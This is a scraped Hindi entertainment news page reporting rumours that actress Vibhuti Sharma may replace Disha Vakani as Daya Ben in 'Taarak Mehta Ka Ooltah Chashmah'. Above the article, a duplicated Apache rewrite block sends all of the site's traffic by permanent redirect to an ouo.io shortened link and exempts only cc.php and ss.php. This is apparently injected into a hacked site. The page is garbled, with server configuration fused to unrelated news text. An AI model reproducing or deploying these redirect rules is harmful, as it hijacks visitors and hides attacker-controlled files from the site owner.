
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 598
पिछले काफी समय से टीवी का पॉपुलर कॉमेडी सीरियल 'तारक मेहता का उल्टा चश्मा' अपने 'दया बेन' के किरदार को लेकर सुर्खियों में है। दया बेन का किरदार निभाने वालीं दिशा वकानी काफी समय से शो से गायब हैं और उनकी वापसी को लेकर रोज कोई न कोई नई खबर सामने आती रहती है। फैन्स काफी समय से दया बेन के किरदार को मिस कर रहे हैं। अब दिशा की वापसी पर एक बड़ी खबर सामने आ रही हैं।
दरअसल, स्पॉटबॉय की रिपोर्ट के मुताबिक शो के मेकर्स को दिशा वकानी का रिप्लेसमेंट मिल गया है। खबर के मुताबिक दिशा की जगह अब एक्ट्रेस विभूति शर्मा, दया बेन का किरदार निभा सकती हैं। हालांकि शो के मेकर्स और विभूति में से किसी ने भी इस खबर की ऑफिशयल अनाउंसमेंट नहीं की है।
बता दें कि विभूति शर्मा इससे पहले सीरियल बड़े अच्छे लगते हैं और हमने ली है शपथ में नजर आ चुकी हैं।
आपको बता दें कि इससे पहले खबर थी कि कि मेकर्स ने दयाबेन के रोल के लिए 'पापड़ पोल' फेम एक्ट्रेस अमी त्रिवेदी को अप्रोच किया है, लेकिन जब इस बारे में अमी त्रिवेदी से संपर्क किया गया तो उन्होंने दयाबेन का रोल ऑफर होने की खबरों को गलत बताया।
दिशा सितंबर 2017 से शो में नहीं हैं। उन्होंने नवंबर 2017 में बेटी को जन्म दिया था। इसके बाद से उन्होंने शो में वापसी नहीं की है।